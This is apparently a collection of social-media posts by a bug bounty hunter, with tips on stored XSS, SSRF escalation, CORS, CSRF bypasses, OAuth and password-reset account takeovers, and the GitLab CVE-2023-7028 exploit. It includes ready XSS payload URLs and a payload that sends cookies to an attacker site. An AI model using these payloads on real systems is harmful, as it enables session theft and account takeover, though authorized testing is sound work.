Researcher in charge @ Ethical InfoSec Services | HackerOne Top 10 | hackerone.com/jayesh25

🕵️‍♂️Here's another secret no one will tell you about: A Simple WAF Bypass for Stored XSS that has earned me $$$$💰 so far! Stored XSS issues can fetch you rewards ranging from $500 to $7500, depending on the program. WAFs can pose significant challenges when hunting for Stored XSS vulnerabilities, but this simple trick can help you bypass them. By adding 'Content-Encoding: any_random_text' to the request header, you can deceive some WAFs, allowing your payload to slip through undetected. Enjoy the hunt! #bugbounty #securityTips #ethicalhacking #WAFBypass #hackerOne #bugcrowd #bugbountytips
59
446
2,015
144,557
🚨 Yay, we were rewarded with $20,000 on our @Hacker0x01 submission for a SSRF bug discovered in collaboration with @Shlibness! 💰🎉 🥳 We uncovered a Critical SSRF vulnerability, turning it into unauthorized access to internal admin endpoints, leading to PII leaks and administrative access! Here’s how we escalated a simple SSRF to a $20,000 bounty. 💰🛡️ 🔍 Step-by-Step Breakdown: 1️⃣During our testing, we found an endpoint accepting an "url" parameter. 2️⃣To confirm it was vulnerable to SSRF, we passed a Burp Collaborator URL and received an HTTP pingback, indicating a potential SSRF issue. ✅ 3️⃣We then attempted to escalate this Issue by accessing localhost and AWS metadata. 4️⃣It turned out the endpoint was part of an AWS Lambda function. By hitting http://localhost:9001/2018-06-01/runtime/invocation/next, we retrieved Lambda function details. 💡 5️⃣At this point, there were no sensitive credentials or Information leaked. But since the SSRF allowed partial read, we wondered: "What if we could access internal services whitelisted for this Lambda?" 🤔 6️⃣Next, we identified two categories of targets across all subdomains: Externally resolving but not directly accessible via HTTP Internally resolving and obviously not accessible via the Internet🌐 7️⃣We used Shub's @infosec_au Surf tool (github.com/assetnote/surf) for discovering potential Internal targets and found 5000+ viable subdomains that were inaccessible from the internet. 🎯 8️⃣Chaining the SSRF further, we searched for Swagger endpoints on all these targets Identified by the surf tool, we ended up looking for endpoints like: http://<internalhost>/swagger-ui/swagger.json http://<internalhost>/api/v1/api-docs http://<internalhost>/api/v2/api-docs etc We discovered that the Lambda function had whitelisted access to internal hosts exposing Swagger API documentation. 🚀 9️⃣The Swagger docs revealed administrative endpoints. Chaining the SSRF again, we accessed these Internal API endpoints, leading to PII leaks and unauthorized access to other internal administrative functionalities. 🔓 ⚠️ Impact: This vulnerability allowed attackers to access internal administrative endpoints, leaking PII and exposing other critical business risks. 🚨 💡Lesson Learned: Don’t stop at confirming SSRF! Always think outside the box and explore ways to escalate for maximum impact. Creativity wins the game! 🧠✨ #BugBounty #HackerOne #BugCrowd #YesWehack #Intigriti #bugbountytips #security Y
58
142
1,081
68,963
Bug Bounty Tips: Penetration Testing Android/iOS Apps? 📱 Today, I'd like to introduce a valuable open source tool that I frequently rely on: Mobile Security Framework (MobSF), an all-in-one mobile app pen-testing and security assessment tool. It works seamlessly with various mobile app formats, and offers dynamic analysis capabilities. The best part? You can try it out without installation! Experience MobSF directly at mobsf.live. If you prefer to install and run your own local version, you can do so via github.com/MobSF/Mobile-Secu…. While MobSF offers a range of features, here's the list of things I use it for: 📥 Easy to use: Easily analyze your APK with straightforward drag-and-drop functionality, eliminating the need for multiple tool installations. This is specifically good for beginners because they don't have to rely on complex installation of 5 different tools for testing an app 🔑 Identifying Hardcoded Secrets: The tool helps flag hardcoded credentials, aiding in validation and reporting. I've had some quick wins through this module with sensitive tokens/API keys disclosed ☕ Reviewing Java Source Code: I mostly use it to examine Java source code for my target, uncovering API endpoints, design flaws, or reverse engineering possibilities to overcome jailbreak detection, etc.. 🕵️ Reverse Engineering: It helps with reverse engineering, including de-compilation, disassembly, and debugging. 🔄 Dynamic Analysis: It Integrates with Genymotion to inspect HTTP traffic while navigating through the app, effectively detecting endpoints. I use it at times to get a quick Idea of what HTTP calls are being made when Initially navigating through my target It's worth noting that I still use other tools like Burp Suite, MITM, and Charles Proxy. However, I usually run my target apps through MobSF first as It gives me a nice overview of the target and some quick wins. Give it a try and enhance your mobile app security assessments! 💪🔍 #BugBounty #MobileSecurity #PenTesting #Cybersecurity #HackerOne #BugCrowd #InfoSec #BugBountyTips
24
246
1,047
150,831
🔐Secrets no one will share with you - Here's a technique that might grant you access to takeover other users' accounts using "Login with Facebook": Are you working on a target site that supports "Login with Facebook"? Disable email sharing during Facebook login and be ready for unusual design flows that could enable you to take over other users' accounts. Here's how to disable email sharing when using "Login with Facebook": 1️⃣ Log in with Facebook on any app. 2️⃣ Click "Edit Access." 3️⃣ Uncheck the email address checkbox. 4️⃣ Click Continue. Here are some scenarios of account takeovers I've reported based on different target app behaviors: Account Takeover via Linking Facebook Flow: 1️⃣ Went to http://example[.]com, used "Login with Facebook" (Uncheck share email on Facebook). 2️⃣ The target site asked to enter an email to link my FB account as no email was shared from FB. Entered victim@example.com, a confirmation link was sent to the victim's email to bind the account. 3️⃣ Repeated the same steps on the target site using the same FB account, this time choose to link attacker@example.com on target site – received the same link as step (2) on the attacker controlled email! 4️⃣ Knowing this, repeated the same steps again to link victim@example.com, and used earlier link which was received on attacker@example.com to takeover victim@example.com account. Direct Account Takeover via Login with Facebook: 1️⃣ Went to http://example[.]com, used "Login with Facebook" (Uncheck share email on Facebook). 2️⃣ The target site prompted me to enter an email to link the FB account to an existing account since no email was shared from FB. Entered victim@example.com. It directly logged me into victim@example.com without any further verification, leading to a complete account takeover. Pre-Account Takeovers: Do you have a target app that heavily relies on a user's email domain to grant access to organizations or critical features based on whitelisted domains? Using this technique can help you bypass email verification requirements, allowing you to claim any email. Consequently, you may be able to access critical features of other organizations permitted for emails with the same domain. Lesson: Always test unusual login flows by logging in with a 3rd party provider without sharing email with the target site. These designs can be flawed and lead to nice bounties! 💰 #BugBounty #CyberSecurity #HackerOne #bugcrowd #securitytips #bugbountytips
31
279
1,015
119,811
Quick Wins: If you come across an outdated Swagger instance, always remember to test for XSS vulnerabilities. Try these payloads and earn some quick bounties! http://example(.)com/swagger-ui/index.html?configUrl=https://jumpy-floor.surge(.)sh/test.json http://example(.)com/swagger-ui/index.html?url=https://jumpy-floor.surge(.)sh/test.yaml http://example(.)com/swagger-ui/index.html?configUrl=https://xss.smarpo(.)com/test.json&url=https://jumpy-floor.surge(.)sh/test.yaml Always try escalating these Issues to an Account takeover to earn a 'High' severity payout. #EthicalHacking #BugBounty #SecurityTips #Cybersecurity #StaySecure
21
260
960
83,946
🤔Question of the day: How to Spot CORS Misconfigurations? It is almost year 2024, yet I continue to discover CORS misconfigurations, adding $$$ to my bug bounty earnings each month. Here's my approach to finding CORS Issues: 1️⃣ Nuclei Scan - Identify vulnerable targets with the cors-misconfig.yaml nuclei template using the command nuclei -u http://target -t cors-misconfig.yaml. You can find the template at github.com/projectdiscovery/… 2️⃣ Manual Approach - If you're manually hunting on a target app and believe that specific GET/POST/PATCH/PUT/DELETE endpoints were missed by nuclei, add an Origin header to your requests with null or your attacker site. Check the response headers for Access-Control-Allow-Origin: <your_arbitrary_origin> or <null> and Access-Control-Allow-Credentials: true. 3️⃣ Craft your POC - To ensure your report doesn't get closed as "Informative" or "NA," provide a working PoC. Here's JavaScript code I host on my attacker-controlled server to demonstrate CORS misconfiguration on a sensitive endpoint: var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { alert(xhr.responseText); } } xhr.open('GET', 'http://targetapp/api/v1/user', true); xhr.withCredentials = true; xhr.send(null); Takeaways: Always include CORS misconfig-specific checks in your bug hunting checklist. Many target apps are still vulnerable to these Issues, which can lead to a high severity payout. #BugBounty #WebSecurity #InfoSec #CORSMisconfigurations #HackerOne #BugCrowd #BugBountyTips
33
257
949
91,097
Bug Bounty Tips: 🐛💰 Here's a simple bug bounty tip for shopping site targets that can earn you some serious $$$$. I've stumbled upon 10+ similar issues on shopping sites that allow guest checkouts 🛒. Many overlook these issues because they require placing an order 📦. However, some services support cash on delivery 💸 or allow you to place a cheap order and then cancel it for a refund 🔄, making it worth adding to your checklist if other prerequisites are met. Here's what to look for: 1️⃣ Target app that permits guest orders without creating an account 🕵️‍♂️ 2️⃣ Target app doesn't require email verification for new account creation, or you've found an email verification bypass on sign-up 📧🔓 If these prerequisites are met, you can often find target apps with a misconfiguration that lets you access a guest user's order history by creating a new account with the same email used for the guest order. Here's how it usually goes down: 1️⃣ Place an order on the site as a "Guest" and use the victim's email during checkout, e.g., victim@example.com 📩 2️⃣ The victim receives an email with the receipt 📧 3️⃣ As an attacker, sign up using the email victim@example.com assuming there's no email verification 🧑‍💻 4️⃣ Navigate to the account's order history page, and you might strike gold 🪙 by finding the previously made orders, leading to Order History and PII leaks 🔍📜 Takeaways: Don't ignore workflows involving payments; you might discover workarounds like cheap payments or cash on delivery 💡💳. Test for unusual flows and be ready for pleasant surprises with some lucrative bounties 💰💎 #BugBounty #CyberSecurity #HackerOne #BugBountyTips #SecurityTips #Bounties #infosecurity
28
228
831
100,029
Hunting on a target with a Salesforce site? 🕵️‍♂️ You're in luck! 🍀 There's a high likelihood of stumbling upon a misconfigured object that could yield bounties ranging from $1,000 to $5,000 due to the sensitive nature of the data. 😲 Don't be fooled, many hunters overlook these targets, assuming they're safe behind a login page. 😅 However, they're actually one of the most common issues I encounter. Here's a simple approach to spot these vulnerabilities: 1️⃣ Install this amazing tool - 🔧 github.com/moniik/poc_salesf… 2️⃣ Run python3 exploit.py -u https://{{target(.)com -d -s 3️⃣ The tool will automatically scan for object misconfigurations and display objects with result counts. 4️⃣ Found any interesting objects with a result count >0? 🧐 5️⃣ You can explore further in this nice article - 📖 infosecwriteups.com/in-simpl… to exploit the misconfiguration. Hope this helps you on your bug bounty journey. 🚀 Enjoy! 🤑 #CyberSecurity #SecurityTips #BugBountyTips #HackerOne #BugCrowd #DailyTips #Bounties #Bounty
22
203
758
97,340
Bug Bounty Tips: Uncover misconfigured Google Drive links, open S3 buckets, Interesting APIs, Secrets, and other sensitive files with JSLuice! 🔍 JSLuice is a powerful Go package and command-line tool for extracting URLs, paths, secrets, and intriguing data from JavaScript source code. Find it at github.com/BishopFox/jsluice 🚀 Here's my approach to using this tool: 1️⃣ Collect URLs from Katana and Waymore, then filter out .JS files. 2️⃣ Download those JS files using wget or curl and run JSLuice on them. 3️⃣ Filter the URLs extracted by JSLuice using keywords like Firebase, Amazon, CloudFront, Google Drive, etc. Manually investigate the results for bucket/cloud misconfigurations and report them for quick wins. 4️⃣ Repeat this process for other Interesting API endpoints, hardcoded credentials, and valuable data within JavaScript source code. You can even create custom scripts to monitor JS files for changes, like new links, secrets, APIs, and more. Learn more about this exceptional tool and its usage here: bishopfox.com/blog/jsluice-j… bishopfox.com/blog/jsluice-j… Level up your bug bounty game! 🐛💰 #BugBountyTips #HackerOne #BugCrowd #SecurityTips #InfoSec #JSLuice #BountyHunting
15
212
747
59,272
🔍Question of the day: Where to find SSRF Issues? Many overlook testing for SSRF vulnerabilities, thinking they're complex and beyond their capabilities. 💻💔 However, these issues can lead to bounties ranging from $1000 to $15000, depending on the Impact. These are the top 5 obvious features I look for in a target app to find SSRF Issues: 1️⃣ Export to PDF - Does your target app support generating PDFs? 📄 Try injecting HTML into the content that is used for generating that PDF. If vulnerable to HTML injection, you might strike gold by injecting HTML/JS.💰 2️⃣ Integrations - If your target app supports web hook Integration feature, replace the URL with your Burp Collab and wait for a hit. 🔄 3️⃣ Import via link Feature - Does your target app support importing files or websites via a link? 📥 Specify your attacker Burp Collab and check for a hit, especially when uploading profile pictures or media through a library. 4️⃣ Host Header - Test for Routing-based SSRF by supplying your Collaborator server domain in the Host header. If you receive a DNS lookup from the target server, you might be able to route requests to arbitrary domains🌐 5️⃣ File Upload - Does your target app support uploading files? 📂 Try uploading an HTML file; if rendered and executed on the server-side, you might strike gold. No luck? Try an SVG with SSRF payload. If that fails, move on to the next! None of the above methods worked? Don't worry; we have more tricks up our sleeves, and we'll be sharing them soon! 🧙‍♂️ Takeaways: Note these features, and if you encounter them in your target app, don't forget to test for SSRF Issues. Who doesn't love some free money while securing the planet? Stay tuned for more! 💸🌍 #cybersecurity #bugbountytips #securitytips #bugcrowd #hackerone #tips #bounty
27
167
697
61,833
🐛Bug Bounty Tips: Using "Waymore" to discover more security Issues🌐 In the bug bounty world, having the right tools is essential. While there are many useful ones like waybackurls and gau, let's focus on "waymore" from @xnl_h4ck3r today. It's a handy tool for finding archived URLs, and it can give you an advantage when hunting for bugs. 🕵️‍♂️ Why "waymore"? It's my favorite tool for deep investigations. Whether I'm exploring a specific target or a new area, "waymore" helps me collect ALL the archived URLs I need. Here's where "waymore" gets its data: 📜 Wayback Machine (web.archive.org): It stores old versions of websites, which can be a goldmine. 🌐 Common Crawl (index.commoncrawl.org): This resource has a massive amount of web data. 🛸 Alien Vault OTX (otx.alienvault.com): It offers threat intelligence, including valuable URL data. 🔎 URLScan (urlscan.io): This service scans and analyzes websites, giving you crucial insights. Now, let's dive into using "waymore": Installation is straightforward: git clone https://github[.]com/xnl-h4ck3r/waymore.git cd waymore sudo python setup.py install sudo pip3 install -r requirements.txt Once it's set up, you can run "waymore" on your target like this: python3 waymore.py -i target[.]com -mode U If you want to go deeper, use -mode R to download all archived responses. This sets the stage for local analysis, where you might uncover hidden treasures like passwords or forgotten APIs. 💎 But what's next in your bug bounty journey? 🤔 1️⃣ One-Liner Magic: Check out this list of one-liners at github.com/dwisiswant0/aweso…. You can apply these to your "waymore" dataset. With a bit of automation, you'll be surprised by the results! 🚀 2️⃣ Testing Tools: Use tools like dalfox, try out nuclei templates, and other XSS detection methods to find vulnerabilities like XSS, SQLI, SSTI, and more. 3️⃣ Custom Searches: Create your checklist for specific keywords like "user," "admin," "orderId=," "id=," "login," "signup," and others. Tailor your searches to what matters most. 4️⃣ Dive into JS: Look at .JS (JavaScript) files, find API endpoints, and test them for issues like IDORs, information leaks, or hardcoded credentials. The details matter. And if you haven't found any bugs yet? 🤷‍♂️ Don't worry; there are many creative paths to explore within this dataset. Stay tuned for more insights! Key Takeaways: Gathering URLs is your secret weapon in bug bounty hunting. Always include testing archived URLs in your research and testing methods – you'll be amazed at what you discover. 🚀 #BugBounty #InfoSec #Cybersecurity #HackerOne #BugCrowd #BugBountyTips
22
200
670
39,448
Bug Bounty Tips: Discovering the Origin IP by scanning your target IP range🕵️‍♂️ When you're hunting on a bug bounty target and WAF stands in your way, here's a powerful technique to uncover the Origin IP by scanning the target's IP range. We'll be using a simple yet effective tool called hakoriginfinder by hakluke! Get it at github.com/hakluke/hakorigin… Here's my methodology to find the Origin IP using this tool and technique: 1️⃣ Discover your target's ASN and check bgp.he.net/AS33848#_prefixes 2️⃣ Make a note of the target's IP range. 3️⃣ Assuming you have a WAF-protected domain called example[.]com. Use this command with the IP range Identified in step 1 and pass your target host against the -h parameter: prips 93.184.216.0/24 | hakoriginfinder -h example[.]com If you receive a "MATCH" output, there's a strong likelihood that you've successfully identified the Origin IP. Now, you can send requests with the same Host header to bypass WAF or for whatever your mission requires. Happy hunting! 🎯💻 #BugBounty #InfoSec #Hacking #Cybersecurity #HackerOne #BugCrowd #BugBountyTips
18
177
667
56,519
🔍 Bug Bounty Tips: Crawling parameters with Katana for quick XSS/SQLI wins! 🚀 When it comes to efficient bug hunting, active crawling can be a game-changer. One of the tools I rely on is Katana, which helps retrieve URLs and parameters for thorough testing against XSS, SQLI, SSTI, and more. 👉 Here's a one-liner that kicks off the process: katana -list targets.txt -silent -d 6 -rl 25 -jc -f qurl 🔑 What's the next step? Take the URLs you've obtained from active crawling and include them in your XSS, SQLI, and SSTI checks. This strategy broadens your attack surface, making it easier to spot vulnerabilities and secure those quick wins. 💡Takeaways: Leveraging Katana's capabilities can help you uncover hidden issues efficiently and bolster your bug bounty earnings. Happy hunting! 💻💰 #BugBounty #Cybersecurity #Katana #XSS #SQLI #SSTI #Infosec #Bugbountytips #HackerOne #BugCrowd
12
168
626
43,633
🔐 Bug Bounty Tips: Reported 15+ XSS Issues on a broad-scoped program leveraging AEM! 🚀 If you stumble upon a target app using AEM, make sure to use these XSS payloads for some quick wins! 💰 1️⃣ https://target[.]com/1<img src=x data'a'onerror=alert(domain)>.childrenlist.htm 2️⃣https://target[.]com/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a" 3️⃣https://target[.]com/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html Always try to escalate these issues to an Account Takeover for the chance at a 'High' severity payout. Stay vigilant! 🕵️‍♂️💡 #EthicalHacking #BugBounty #SecurityTips #Cybersecurity #StaySecure #HackerOne #BugCrowd #BugBountyTips
12
156
628
42,616
Bug Bounty Tips: Working on a target app that requires an International phone # for sign up? 📲🌏 Don't let International phone number requirements stop your bug bounty journey! Here are my top 3 favorite services for receiving SMS online to tackle these targets: 1️⃣ https://receive-sms[.]cc - Swift and efficient, it covers the US, UK, and more, receiving SMS almost instantly. 2️⃣ TextNow Android App - Get a dedicated phone number for free using the TextNow Android App. Install it from play.google.com/store/apps/d… and enjoy seamless SMS and phone call reception. 3️⃣ https://onlinesim[.]io/ - This service lets you purchase or rent dedicated phone numbers for specified durations, capable of receiving SMS from any services. Don't overlook targets demanding an International phone number for sign-up/login; they often hold juicy opportunities for discovering authentication bugs and earning bounties! 🌐🔐 #BugBounty #InfoSec #Hacking #Cybersecurity #SMSVerification #BugBountyTips #HackerOne #BugCrowd
21
174
618
72,473
🔍 Question of the day: Which tools are your go-to choices for bug bounty automation? 1) amass 2) subfinder 3) github-subdomains 4) findomain 5) assetfinder 6) securitytrails 7) Rapid DNS 8) crt(.)sh 9) dnsx 10) massdns 11) puredns 12) httpx 13) naabu 14) RustScan 15) katana 16) hakrawler 17) wayback 18) gau 19) waymore 20) nuclei 21) Intelx 22) Short Name Scanner 23) axiom 24) ShadowClone 25) anew 26) qsreplace 27) chaos 28) notify 29) ffuf 30) gotator 31) gowitness 32) dorks_hunter 33) dehashed 34) dirbuster 35) LinkFinder 36) Param Miner 37) Arjun 38) clairvoyance 39) sqlmap 40) Ghauri 41) XSStrike 42) dalfox 43) dnsReaper Let me know If I've missed out on any other Important ones :) #BugBountyTips #HackerOne #BugCrowd #SecurityTips #InfoSec #CyberSecurity
29
139
614
72,795
🔒Sharing more secrets - It's 2023, and CSRF issues are far from extinct. In fact, I've discovered and reported 100+ CSRF vulnerabilities this year, raking in five figures $$$$$!💰 🚀 My top 5 CSRF bypass techniques and their secrets to success: 1️⃣ Swap "POST" with "GET": Instead of using POST requests, switch to GET and move the body parameters into the URI. This simple maneuver often overrides CSRF token implementations, enabling a full-blown CSRF attack. 2️⃣ JSON Requests: Even JSON requests relying on cookies can be vulnerable to CSRF. Here's the trick: send your request with a content-type of text/html and format the body in JSON. In some cases, if the application doesn't rely on the content-type header, CSRF can still work its magic. 3️⃣ Don't Blindly Trust CSRF Tokens: Just because an application has a CSRF token doesn't mean it's foolproof. Sometimes, backend validation for these tokens can be flawed. This means that even with the same token, a CSRF attack may still work on other users' accounts. 4️⃣ Remove the CSRF Token Parameter: Believe it or not, some applications are designed to support legacy versions. If you try removing the CSRF token parameter from the request, it may still work. This is often because apps have dual implementations, and if the parameter is missing, they fall back to the legacy version to support older versions of the app, which can often be vulnerable. 5️⃣ Legacy Endpoints: Hidden in JS files are legacy endpoints that may no longer be actively in use, but they can still be functional and vulnerable to CSRF attacks. These abandoned endpoints are usually not maintained or updated to the latest security standards, making them prime targets for CSRF exploitation. 🎯 Lesson: CSRF issues are not to be underestimated. They are often hiding in plain sight, waiting to be discovered, and they can offer substantial bounties. Happy hunting, and enjoy the rewards! 💎💻 #Cybersecurity #CSRF #BugBounty #InfoSec #hackerone #bugcrowd #cybersecuritytips #securitytips 💰💡
18
142
573
45,715
💰Bug Bounty Tips: Scored a $5,000 bounty via APIs exposed on a Swagger endpoint! 💻 Discovered a Swagger UI showing API endpoints—all endpoints required auth. Instead of stopping there, I tried something different: using an Authorization token and cookies from a different subdomain of the target. To my surprise, the Authorization token from a different service worked, unlocking internal APIs that exposed sensitive PII, allowing me to delete users data, and more! 🚨 Takeaway: Don’t limit yourself to XSS/HTML Injection on Swagger endpoints. Test all API endpoints using Auth tokens or cookies from other subdomains—you might get lucky! #API #BugBounty #Security #HackerOne #BugCrowd #Recon #Intigriti #YesWeHack
11
95
576
37,095
Bug Bounty Tips: 🐛🔐 Unlocking Important Resources with Email Verification Bypass Working on a target where email verification is crucial? Imagine a scenario where gaining access to a specific domain, like example[.]com, could grant you entry into a victim's workspace, allowing you to view documents and other content associated with that whitelisted domain. Often, email verification bypass issues are reported without demonstrating real-time impact or as pre-account takeovers. Consequently, many of these submissions get marked as "Informative." Here's my approach on how to showcase the impact of these issues: Identify Features Dependent on Email Domain: Identify critical features linked to a user's email domain. For instance, consider a target app that grants access to resources based on your email domain. Some apps let you join a team or workspace directly if your email matches the team's domain (e.g., join Victim SITE XYZ only with sample@victimsitexyz[.]com). Others restrict access to documents or videos based on email domain whitelisting. Numerous such opportunities exist where email plays a crucial role. Here's a simple trick that often works to bypass email verification and claim an unregistered email on any domain: 1️⃣ Log in to your attacker account and change your email address to an attacker-controlled email (e.g., attackeremail@attackerdomain.com). 2️⃣ You'll likely receive an email confirmation link on your attacker-controlled email (Do not verify it yet). 3️⃣ Now, change your email to the unregistered email or domain you wish to HIJACK (e.g., victimemail@victimdomain.com). 4️⃣ This action will send an email verification link to victimemail@victimdomain.com, which you don't have access to. 5️⃣ Try clicking on the "Email" verification link sent earlier to attackeremail@attackerdomain.com. If the system fails to revoke the previous email verification link, the link for attackeremail@attackerdomain.com could end up verifying the email for victimemail@victimdomain.com, allowing you to claim it as verified. Once you've claimed an email associated with another organization's domain, identify the associated functions to prove impact and report it to earn some generous bounties! Numerous similar misconfigurations exist that you can leverage to bypass email verification checks. Takeaways: Don't report email verification issues without demonstrating actual impact. Apps that support organizations/workspaces with multiple roles often rely on a person's email domain, making them valid candidates for showcasing security impact. 💡🛡️ #BugBounty #Cybersecurity #HackingTips #HackerOne #BugCrowd #BugBountyTips #SecurityTips
17
126
559
54,446
Bug Bounty Tips: Extract API Endpoints and Construct Complex HTTP Requests from JavaScript Files Using AI Stuck analyzing complex JS files while manually hunting on a target and can't figure out how to construct those GET/POST requests? 🤯 No fancy tools needed! 👉 Quick tip: Copy the JS file from your Chrome Dev Console, save it locally, and upload it to ChatGPT. Use this prompt: "Could you read this JavaScript file and help me construct GET/POST endpoints?" Then, ask for specific requests like: "Can you help me construct the API request for getUserDetails with a raw HTTP example based on the JavaScript file uploaded?" and other similar questions based on the functionality you're looking into within the JavaScript source code. You’ll be amazed by the results as ChatGPT constructs these complex GET/POST requests with parameters based on the AI code review—making what seemed impossible at first glance possible! 🚀 Once you have this information, you can start manually testing the endpoints with your cookies to test for IDORs, SQLi, CSRF, Privilege Escalations, XSS, etc. #BugBountyTips #SourceCode #Infosec #HackerOne #BugCrowd 🕵️‍♂️🎯
21
145
570
41,074
🔍GitLab CVE-2023-7028 - Uncover account takeover potential with a simple password reset method. Known POC: user[email][]=valid@email.com&user[email][]=attacker@email.com Identifying vulnerable targets: 1️⃣ Utilize the nuclei template at github.com/projectdiscovery/… to spot exposed Gitlab Instances. 2️⃣ Hunt for potentially valid victim org emails through various sources. An effortless choice is app.snov.io/domain-search?na…. 3️⃣ Install and execute the Python script found at github.com/RandomRobbieBF/CV… on these hosts. If the target is vulnerable you'll likely receive an email on your attacker-controlled server. Usage: CVE-2023-7028.py [-u URL] -v victim@example[.]com -a attacker@wearehackerone[.]com #BugBountyTips #HackerOne #BugCrowd #Security #InfoSec #SecurityTips
9
103
530
37,703
🔐💰 Question of the day: "How to Maximize Payouts with XSS Vulnerabilities"🤑Learn from my past mistakes! In my early days, I reported over 50 XSS issues, but I missed out on maximizing their impact, resulting in bounties that were only a fraction of what I could have earned. Bounties for 'High' severity XSS Issues can range from $1,000 to $20,000. 💸 Here's a strategy to escalate XSS Vulnerabilities and boost your payouts: 1️⃣Always aim to turn XSS Vulnerabilities into account takeovers. Here's a simple payload you can use to demonstrate ATO: "><img src="x" onerror="document.location.href='https://attackersite(.)com?cookies=' + document.cookie + ''"> This payload exfiltrates user cookies and forwards them to an attacker-controlled site. Create a Proof of Concept (PoC) video showing how these cookies can hijack a user's session e.g. send a request to any authenticated API and demonstrate that the cookies work. This will earn you a 'High' severity bounty. 2️⃣If cookies are set as HTTPOnly, don't worry. Elevate the impact by performing sensitive client-side actions, such as changing a user's email address or password, and escalate it to an account takeover. 3️⃣If sensitive client-side actions aren't possible, check for leaked session cookies or tokens in the server's responses on all pages. Use your XSS payload to exfiltrate these and escalate to an account takeover. 4️⃣If no session cookies or tokens are found on any pages, examine the browser's local storage for stored session tokens and exfiltrate them to escalate to an account takeover. 5️⃣ If none of the above methods work, stay tuned for more tips! 😄 🚀Common mistakes to avoid: Reporting XSS as simple "Medium" risk issues without maximizing their impact. Don't underestimate their potential. Always seek ways to escalate XSS Issues to account takeovers for substantial bounties! 💡 #BugBounty #InfoSec #xss #crosssitescripting #Cybersecurity #BugBountyTips #HackerOne #BugCrowd #SecurityTips #QuestionOfTheDay
25
124
517
45,563
🔒 Question of the day: How to hunt on restricted web applications protected behind a login page? 🤔 Well, guess what? While most folks tend to overlook these targets, I've pocketed over 5 figures $$$$$💰 from such apps. Bounties for findings on these assets often result in generous High/Crit payouts, ranging from $2,000 to $10,000. 💸 Here's a rundown of what you can do to uncover issues with such targets: 1️⃣Response Manipulation: Create a "match and replace" rule in Burp Suite to swap "false" with "true" and 403/401 status codes with 200. After this, try accessing the app and log in with an incorrect password while keeping Burp Suite active. 🛡️ This trick can often reveal whether the app relies on client-side validation for such apps, potentially granting unauthorized access due to lack of server-side authorization checks. 2️⃣Brute Force: Test common username/password combinations. Many such apps use predictable credentials, like admin:admin, admin:password, etc. 3️⃣SQL Injection: Perform SQL Injection on the login for these targets using tools like SQLMAP or Ghauri. It may take some time, but since it's just a single request, it's definitely worth a shot. Prepare to be amazed by the results! 😲 4️⃣JS endpoints: Review all exposed JS files on the page and extract endpoints using JSBeautify/LinkFinder. Often, you'll discover APIs that are vulnerable to IDOR/Information disclosure, even without authentication, potentially leading to nice bounties. 5️⃣Directory Fuzzing: Utilize FFUF or equivalent tools to fuzz for directories. You can find excellent wordlists at wordlists.assetnote.io, tailored to the web application's underlying technology. 6️⃣Breached Credentials Services: Many people employ these services to search for org employees or other credentials linked to the target. If found, they often test them to access the admin page and report the findings (Note - not all programs accept this). 7️⃣Wayback: Always check for archived URLs related to the target, as they may reveal accessible paths without authentication, providing direct access to the dashboard. There are many more tricks to get around such target apps. We'll talk more in detail with specific examples in future tweets. 🚀Lesson: Do not ignore these types of apps, as they are often a goldmine! 🕵️‍♂️🌐 #Cybersecurity #BugBounty #WebSecurity #hackerone #bugcrowd #securitytips #questionoftheday #bugbountytips #earn #bounties
23
119
522
39,889
🐞Bug Bounty Tips: Looking for an all-in-one reconnaissance tool for your bug bounty automation game? Are you finding it challenging to allocate time for automating your bug bounty efforts and seeking a pre-built solution? 🕵️‍♂️ Look no further! Let me introduce you to "reNgine," a tool I personally love for its robust features and user-friendly interface. reNgine, an exceptional open-source tool, offers a powerful solution to automate your bug bounty efforts. With its robust features and user-friendly interface, it simplifies the reconnaissance phase, making it a must-have for bug hunters. Features It Automates: 1️⃣ Subdomain Discovery 2️⃣ IP and Open Ports Identification 3️⃣ Endpoints Discovery 4️⃣ Directory/Files Fuzzing 5️⃣ Screenshot Gathering 6️⃣ Vulnerability Scanning 7️⃣ Nuclei 8️⃣ Dalfox XSS Scanner 9️⃣ CRLFuzzer And More... Key Highlights: 🚀 Highly Customizable Engines 🔄 Continuous Monitoring 📊 Recon Data Visualization 🧠 GPT Vulnerability Description 🌐 OSINT Capabilities 🛠️ Toolbox with Essential Tools 📈 Advanced Query Lookup 📣 Customizable Alerts 📝 Recon Notes and Todos 🔄 Periodic Scans 📷 Screenshot Gallery You can learn more about the tool and find the Installation Instructions at github.com/yogeshojha/rengin… Unlock the potential of your bug bounty journey with reNgine's automated insights. It's time to level up! 🚀 #BugBounty #Reconnaissance #CyberSecurity #HackingTools #InfoSec #HackerOne #BugCrowd #BugBountyTips #BugBountyAutomation #Rengine
12
139
518
60,107
🤔Question of the day: What are the common vulnerabilities within the "Forgot Password" functionality? Many users tend to overlook testing the "Forgot Password" feature of a target app. However, these functions are often susceptible to various issues. If exploited, these issues can lead to an account takeover, yielding bounties ranging from $750 to $7500, depending on the program. Here are the common issues you should be on the lookout for: 1️⃣ Token and username parameter: Some target apps often generate a password reset link containing a token and a username parameter. In such cases, request a password reset link on your attacker account, navigate to it, and attempt to replace the "username" parameter with the victim's username. Try resetting the password using your token. This is frequently one of the most common issues I've encountered that leads to an Account Takeover (ATO). 2️⃣ Password reset poisoning: Request a password reset using the victim's account and alter the "Host" header of the request to https://attackercontrolledsite(.)com. If the target app is vulnerable, this will trigger an email to the victim with a password link pointing to your server (e.g., https://attackercontrolledsite(.)com?token=dsksdjsdjsdjdsjdsjsd. When the victim clicks on this link, you will receive the password reset token, paving the way for an ATO. 3️⃣ HTTP Parameter Pollution: When requesting a password reset, always attempt to pass multiple email parameters (e.g., email=victim@target(.)com&email=attacker@target(.)com). Depending on how the application's backend is set up, it may have different routines running on various servers to check validity and send emails. Consequently, it could inadvertently send the password reset link of victim@target(.)com to attacker@target(.)com. 4️⃣ None of the above worked? Fret not! We have many more scenarios that can be exploited, and we'll discuss them in our future tweets. Takeaways: Never underestimate the importance of the password reset functionality, as issues in these areas can lead to lucrative payouts. Be creative and make sure to add these items to your checklist. #CyberSecurityTips #SecurityTips #BugBountyTips #InfoSec #HackerOne #BugCrowd #portswigger #burpsuite
12
113
515
42,275
